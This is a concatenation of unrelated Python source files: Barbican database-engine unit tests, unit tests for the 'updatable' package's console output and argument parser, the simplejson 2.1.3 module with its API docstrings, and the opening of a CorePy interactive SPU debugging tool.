mock_create_engine.return_value = engine
exception_result = self.assertRaises(
exception.BarbicanException,
repositories._get_engine,
None)
self.assertEqual(
'Error configuring registry database with supplied '
'sql_connection. Got error: Abort!',
exception_result.message)
@mock.patch('barbican.model.repositories._create_engine')
def test_should_complete_with_no_alembic_create_default_configs(
self, mock_create_engine):
repositories.CONF.set_override("db_auto_create", False)
engine = mock.MagicMock()
mock_create_engine.return_value = engine
# Invoke method under test.
repositories._get_engine(None)
engine.connect.assert_called_once_with()
mock_create_engine.assert_called_once_with(
'connection',
pool_recycle=3600,
convert_unicode=True,
echo=False
)
@mock.patch('barbican.model.repositories._create_engine')
def test_should_complete_with_no_alembic_create_pool_configs(
self, mock_create_engine):
repositories.CONF.set_override("db_auto_create", False)
repositories.CONF.set_override(
"sql_pool_class", "QueuePool")
repositories.CONF.set_override("sql_pool_size", 22)
repositories.CONF.set_override("sql_pool_max_overflow", 11)
engine = mock.MagicMock()
mock_create_engine.return_value = engine
# Invoke method under test.
repositories._get_engine(None)
engine.connect.assert_called_once_with()
mock_create_engine.assert_called_once_with(
'connection',
pool_recycle=3600,
convert_unicode=True,
echo=False,
poolclass=sqlalchemy.pool.QueuePool,
pool_size=22,
max_overflow=11
)
class WhenTestingAutoGenerateTables(utils.BaseTestCase):
@mock.patch('barbican.model.migration.commands.upgrade')
def test_should_complete_with_alembic_database_update(
self, mock_commands_upgrade):
tables = dict(
alembic_version='version') # Mimic tables already created.
engine = 'engine'
# Invoke method under test.
repositories._auto_generate_tables(engine, tables)
mock_commands_upgrade.assert_called_once_with()
class WhenTestingIsDbConnectionError(utils.BaseTestCase):
def test_should_return_false_no_error_code_in_args(self):
args = mock.MagicMock()
args.find.return_value = -1
result = repositories.is_db_connection_error(args)
self.assertFalse(result)
def test_should_return_true_error_code_found_in_args(self):
args = mock.MagicMock()
args.find.return_value = 1
result = repositories.is_db_connection_error(args)
self.assertTrue(result)
| |
#!/usr/bin/env python
import sys
import unittest
from io import StringIO
from unittest.mock import patch
from argparse import ArgumentTypeError
from updatable.console import _str_to_bool, _list_updates, _list_package_updates, _updatable, _argument_parser
from test.utils import get_environment_requirements_list_monkey, TEST_REQUIREMENTS_PATH
class Capture(list):
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio # free up memory
sys.stdout = self._stdout
class TestStrToBool(unittest.TestCase):
def test_str_to_bool_true(self):
self.assertTrue(_str_to_bool(True))
self.assertTrue(_str_to_bool('t'))
self.assertTrue(_str_to_bool('y'))
self.assertTrue(_str_to_bool('True'))
self.assertTrue(_str_to_bool('YES'))
self.assertTrue(_str_to_bool('1'))
def test_str_to_bool_false(self):
self.assertFalse(_str_to_bool(False))
self.assertFalse(_str_to_bool('f'))
self.assertFalse(_str_to_bool('n'))
self.assertFalse(_str_to_bool('False'))
self.assertFalse(_str_to_bool('NO'))
self.assertFalse(_str_to_bool('0'))
def test_str_to_bool_exception(self):
with self.assertRaises(ArgumentTypeError):
_str_to_bool('')
with self.assertRaises(ArgumentTypeError):
_str_to_bool('falsy')
with self.assertRaises(ArgumentTypeError):
_str_to_bool('eye')
class TestListUpdates(unittest.TestCase):
def test_with_empty_list(self):
with Capture() as output:
_list_updates("Test", [], 'MIT')
self.assertListEqual(output, [])
def test_with_updates_in_list(self):
with Capture() as output:
_list_updates("Test", [
{"version": "1.0.0", "upload_time": "date 1"},
{"version": "2.0.0", "upload_time": "date 2"},
], 'MIT')
self.assertListEqual(output, [
' Test:',
' -- 1.0.0 on date 1 - License: MIT',
' -- 2.0.0 on date 2 - License: MIT',
])
class TestListPackageUpdates(unittest.TestCase):
def _mock_get_package_update_list(*args, **kwargs):
# No updates, no prereeases, no non semantic version
if args[1] == 'package1':
return {
'newer_releases': 0,
'pre_releases': 0,
'major_updates': [],
'minor_updates': [],
'patch_updates': [],
'pre_release_updates': [],
'non_semantic_versions': [],
'current_release_license': 'MIT',
}
# Updates, no prereeases, no non semantic version
if args[1] == 'package2':
return {
'newer_releases': 5,
'pre_releases': 0,
'major_updates': [
{"version": "2.0.0", "upload_time": "date 3"},
{"version": "3.0.0", "upload_time": "date 5"},
],
'minor_updates': [
{"version": "1.5.0", "upload_time": "date 2"},
{"version": "2.5.0", "upload_time": "date 4"},
],
'patch_updates': [
{"version": "1.5.5", "upload_time": "date 5"},
],
'pre_release_updates': [],
'non_semantic_versions': [],
'current_release_license': 'MIT',
}
# Updates, no prereeases, non semantic version
if args[1] == 'package3':
return {
'newer_releases': 1,
'pre_releases': 0,
'major_updates': [
],
'minor_updates': [
],
'patch_updates': [
{"version": "1.5.5", "upload_time": "date 5"},
],
'pre_release_updates': [],
'non_semantic_versions': [
{"version": "test1.5.5.3.2.3.23", "upload_time": "date 6"},
],
'current_release_license': 'MIT',
}
# Updates, prereeases, non semantic version
if args[1] == 'package4':
return {
'newer_releases': 1,
'pre_releases': 1,
'major_updates': [
],
'minor_updates': [
],
'patch_updates': [
{"version": "1.5.5", "upload_time": "date 5"},
],
'pre_release_updates': [
{"version": "alfa-1.5.5", "upload_time": "date 7"},
],
'non_semantic_versions': [
{"version": "test1.5.5.3.2.3.23", "upload_time": "date 6"},
],
'current_release_license': 'MIT',
}
# No updates, prereeases, non semantic version
if args[1] == 'package5':
return {
'newer_releases': 0,
'pre_releases': 1,
'major_updates': [
],
'minor_updates': [
],
'patch_updates': [],
'pre_release_updates': [
{"version": "alfa-1.5.5", "upload_time": "date 7"},
],
'non_semantic_versions': [
{"version": "test1.5.5.3.2.3.23", "upload_time": "date 6"},
],
'current_release_license': 'MIT',
}
# Pre releases only
if args[1] == 'package6':
return {
'newer_releases': 0,
'pre_releases': 1,
'major_updates': [
],
'minor_updates': [
],
'patch_updates': [],
'pre_release_updates': [
{"version": "alfa-1.5.5", "upload_time": "date 7"},
],
'non_semantic_versions': [],
'current_release_license': 'MIT',
}
# Non semantic version only
if args[1] == 'package7':
return {
'newer_releases': 0,
'pre_releases': 0,
'major_updates': [
],
'minor_updates': [
],
'patch_updates': [],
'pre_release_updates': [],
'non_semantic_versions': [
{"version": "test1.5.5.3.2.3.23", "upload_time": "date 6"},
],
'current_release_license': 'MIT',
}
def _mock_argument_parser(*args, **kwargs):
class MockResult():
file = get_environment_requirements_list_monkey()
pre_releases = False
class ArgumentParserMock():
def parse_args(*args, **kwargs):
return MockResult()
return ArgumentParserMock()
def test_with_no_available_updates(self):
with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
with Capture() as output:
_list_package_updates("package1", "1.0.0", False)
self.assertListEqual(output, [])
with Capture() as output:
_list_package_updates("package1", "1.0.0", True)
self.assertListEqual(output, [])
def test_with_updates_and_no_prereleases(self):
with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
with Capture() as output:
_list_package_updates("package2", "1.0.0", False)
self.assertListEqual(output, [
'package2 (1.0.0) - License: MIT',
' Major releases:',
' -- 2.0.0 on date 3 - License: MIT',
' -- 3.0.0 on date 5 - License: MIT',
' Minor releases:',
' -- 1.5.0 on date 2 - License: MIT',
' -- 2.5.0 on date 4 - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
'___'
])
with Capture() as output:
_list_package_updates("package2", "1.0.0", True)
self.assertListEqual(output, [
'package2 (1.0.0) - License: MIT',
' Major releases:',
' -- 2.0.0 on date 3 - License: MIT',
' -- 3.0.0 on date 5 - License: MIT',
' Minor releases:',
' -- 1.5.0 on date 2 - License: MIT',
' -- 2.5.0 on date 4 - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
'___'
])
def test_with_updates_and_no_prereleases_and_non_semantic_versions(self):
with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
with Capture() as output:
_list_package_updates("package3", "1.0.0", False)
self.assertListEqual(output, [
'package3 (1.0.0) - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
' Unknown releases:',
' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
'___'
])
with Capture() as output:
_list_package_updates("package3", "1.0.0", True)
self.assertListEqual(output, [
'package3 (1.0.0) - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
' Unknown releases:',
' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
'___'
])
def test_with_updates_and_prereleases_and_non_semantic_versions(self):
with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
with Capture() as output:
_list_package_updates("package4", "1.0.0", False)
self.assertListEqual(output, [
'package4 (1.0.0) - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
' Unknown releases:',
' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
'___'
])
with Capture() as output:
_list_package_updates("package4", "1.0.0", True)
self.assertListEqual(output, [
'package4 (1.0.0) - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
' Unknown releases:',
' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
' Pre releases:',
' -- alfa-1.5.5 on date 7 - License: MIT',
'___'
])
def test_with_prereleases_and_non_semantic_versions(self):
with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
with Capture() as output:
_list_package_updates("package5", "1.0.0", False)
self.assertListEqual(output, [])
with Capture() as output:
_list_package_updates("package5", "1.0.0", True)
self.assertListEqual(output, [
'package5 (1.0.0) - License: MIT',
' Pre releases:',
' -- alfa-1.5.5 on date 7 - License: MIT',
'___'
])
def test_with_prereleases(self):
with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
with Capture() as output:
_list_package_updates("package6", "1.0.0", False)
self.assertListEqual(output, [])
with Capture() as output:
_list_package_updates("package6", "1.0.0", True)
self.assertListEqual(output, [
'package6 (1.0.0) - License: MIT',
' Pre releases:',
' -- alfa-1.5.5 on date 7 - License: MIT',
'___'
])
def test_with_non_semantic_versions(self):
with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
with Capture() as output:
_list_package_updates("package7", "1.0.0", False)
self.assertListEqual(output, [])
with Capture() as output:
_list_package_updates("package7", "1.0.0", True)
self.assertListEqual(output, [])
def test_updatable_call(self):
with patch('updatable.console._argument_parser', side_effect=self._mock_argument_parser):
with patch('updatable.utils.get_package_update_list', side_effect=self._mock_get_package_update_list):
with Capture() as output:
_updatable()
self.assertListEqual(output, [
'package2 (1.0) - License: MIT',
' Major releases:',
' -- 2.0.0 on date 3 - License: MIT',
' -- 3.0.0 on date 5 - License: MIT',
' Minor releases:',
' -- 1.5.0 on date 2 - License: MIT',
' -- 2.5.0 on date 4 - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
'___',
'package3 (2) - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
' Unknown releases:',
' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
'___',
'package4 (2.4) - License: MIT',
' Patch releases:',
' -- 1.5.5 on date 5 - License: MIT',
' Unknown releases:',
' -- test1.5.5.3.2.3.23 on date 6 - License: MIT',
'___'
])
class TestArgumentParser(unittest.TestCase):
def setUp(self):
self.parser = _argument_parser()
def test_argument_parser_pre_release(self):
# Long param
parsed = self.parser.parse_args(['--pre-release', 'True'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['--pre-release', 'Yes'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['--pre-release', 'T'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['--pre-release', 't'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['--pre-release', '1'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['--pre-release', 'TrUe'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['--pre-release', 'f'])
self.assertEqual(parsed.pre_releases, False)
parsed = self.parser.parse_args(['--pre-release', 'n'])
self.assertEqual(parsed.pre_releases, False)
parsed = self.parser.parse_args(['--pre-release', '0'])
self.assertEqual(parsed.pre_releases, False)
parsed = self.parser.parse_args(['--pre-release', 'FaLse'])
self.assertEqual(parsed.pre_releases, False)
with self.assertRaises(SystemExit):
self.parser.parse_args(['--pre-release', 'Invalid'])
# Short param
parsed = self.parser.parse_args(['-pr', 'True'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['-pr', 'Yes'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['-pr', 'T'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['-pr', 't'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['-pr', '1'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['-pr', 'TrUe'])
self.assertEqual(parsed.pre_releases, True)
parsed = self.parser.parse_args(['-pr', 'f'])
self.assertEqual(parsed.pre_releases, False)
parsed = self.parser.parse_args(['-pr', 'n'])
self.assertEqual(parsed.pre_releases, False)
parsed = self.parser.parse_args(['-pr', '0'])
self.assertEqual(parsed.pre_releases, False)
parsed = self.parser.parse_args(['-pr', 'FaLse'])
self.assertEqual(parsed.pre_releases, False)
with self.assertRaises(SystemExit):
self.parser.parse_args(['-pr', 'Invalid'])
def test_invalid_argument(self):
with self.assertRaises(SystemExit):
self.parser.parse_args(['--invalid', 'Value'])
def test_argument_parser_pre_file(self):
# Long param
parsed = self.parser.parse_args(['--file', TEST_REQUIREMENTS_PATH])
self.assertEqual(list(parsed.file), [
"package1==0.1\n",
"package2==1.0\n",
"package3==2\n",
"package4==2.4\n",
"package5==3.0.0"
])
with self.assertRaises(SystemExit):
self.parser.parse_args(['--file', 'Invalid'])
# Short param
parsed = self.parser.parse_args(['-f', TEST_REQUIREMENTS_PATH])
self.assertEqual(list(parsed.file), [
"package1==0.1\n",
"package2==1.0\n",
"package3==2\n",
"package4==2.4\n",
"package5==3.0.0"
])
with self.assertRaises(SystemExit):
self.parser.parse_args(['-f', 'Invalid'])
if __name__ == '__main__':
unittest.main()
| |
r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`simplejson` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility with Python 2.4 and Python 2.5 and (currently) has
significant performance advantages, even without using the optional C
extension for speedups.
Encoding basic Python object hierarchies::
>>> import simplejson as json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print json.dumps("\"foo\bar")
"\"foo\bar"
>>> print json.dumps(u'\u1234')
"\u1234"
>>> print json.dumps('\\')
"\\"
>>> print json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson as json
>>> json.dumps([1,2,3,{'4': 5, '6': 7}], separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson as json
>>> s = json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=' ')
>>> print '\n'.join([l.rstrip() for l in s.splitlines()])
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson as json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import simplejson as json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> from decimal import Decimal
>>> json.loads('1.1', parse_float=Decimal) == Decimal('1.1')
True
Specializing JSON object encoding::
>>> import simplejson as json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... raise TypeError(repr(o) + " is not JSON serializable")
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using simplejson.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expecting property name: line 1 column 2 (char 2)
"""
__version__ = '2.1.3'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONDecodeError', 'JSONEncoder',
'OrderedDict',
]
__author__ = 'Bob Ippolito <bob@redivi.com>'
from decimal import Decimal
from decoder import JSONDecoder, JSONDecodeError
from encoder import JSONEncoder
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
import ordered_dict
return ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
def _import_c_make_encoder():
try:
from simplejson._speedups import make_encoder
return make_encoder
except ImportError:
return None
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
use_decimal=False,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=False, **kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, then the some chunks written to ``fp``
may be ``unicode`` instances, subject to normal Python ``str`` to
``unicode`` coercion rules. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
to cause an error.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If *indent* is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *use_decimal* is true (default: ``False``) then decimal.Decimal
will be natively serialized to JSON with full precision.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not kw):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, use_decimal=use_decimal, **kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=False, **kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is false then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, then the return value will be a
``unicode`` instance subject to normal Python ``str`` to ``unicode``
coercion rules instead of being escaped to an ASCII ``str``.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *use_decimal* is true (default: ``False``) then decimal.Decimal
will be natively serialized to JSON with full precision.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not use_decimal
and not kw):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
use_decimal=use_decimal, **kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None,
object_pairs_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, **kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, object_pairs_hook=object_pairs_hook,
use_decimal=use_decimal, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and object_pairs_hook is None
and not use_decimal and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if object_pairs_hook is not None:
kw['object_pairs_hook'] = object_pairs_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
if use_decimal:
if parse_float is not None:
raise TypeError("use_decimal=True implies parse_float=Decimal")
kw['parse_float'] = Decimal
return cls(encoding=encoding, **kw).decode(s)
def _toggle_speedups(enabled):
import simplejson.decoder as dec
import simplejson.encoder as enc
import simplejson.scanner as scan
c_make_encoder = _import_c_make_encoder()
if enabled:
dec.scanstring = dec.c_scanstring or dec.py_scanstring
enc.c_make_encoder = c_make_encoder
enc.encode_basestring_ascii = (enc.c_encode_basestring_ascii or
enc.py_encode_basestring_ascii)
scan.make_scanner = scan.c_make_scanner or scan.py_make_scanner
else:
dec.scanstring = dec.py_scanstring
enc.c_make_encoder = None
enc.encode_basestring_ascii = enc.py_encode_basestring_ascii
scan.make_scanner = scan.py_make_scanner
dec.make_scanner = scan.make_scanner
global _default_decoder
_default_decoder = JSONDecoder(
encoding=None,
object_hook=None,
object_pairs_hook=None,
)
global _default_encoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
| |
# Copyright (c) 2006-2009 The Trustees of Indiana University.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# - Neither the Indiana University nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Playing around with debugging and interactive SPE development...
__doc__ = """
ispu is an interactive SPU program that lets the user execute commands
one at a time on the SPU and view the results in Python.
ispu has command line and GUI modes. The GUI used wxPython. To run
the GUI, make sure wxPython is installed and simply run ispu.py from
the command line:
% pythonw ispu.py
The command line mode lets the user run ispu in the Python
interpreter. The following is a a simple SPU session:
% python
...
>>> import corepy.arch.spu.isa as spu
>>> import ispu
>>> cli = ispu.ISPU()
>>> cli.start()
>>> cli.execute(spu.iohl(127, 0xB8CA))
>>> cli.execute(spu.iohl(126, 0x1234))
>>> cli.execute(spu.a(125, 126, 127))
>>> regs = cli.get_regs()
>>> print '%X' % regs[125][0]
>>> cli.stop()
When running, ispu reserves an SPU. When used interactively, make
sure to call the stop() method to free the SPU when done.
"""
import corepy.arch.spu.platform as env
import corepy.arch.spu.isa as spu
import corepy.arch.spu.lib.util as util
import corepy.lib.extarray as extarray
# Feature TODO:
# Allow for an instruction stream to be passed in
# Breakpoints?
# Watch variables?
# Local store inspection
# Memory inspection
# Changing of register/local store/memory contents via GUI
# Insert the instructions to do this into the stream?
# Or just do it all behind the scenes?
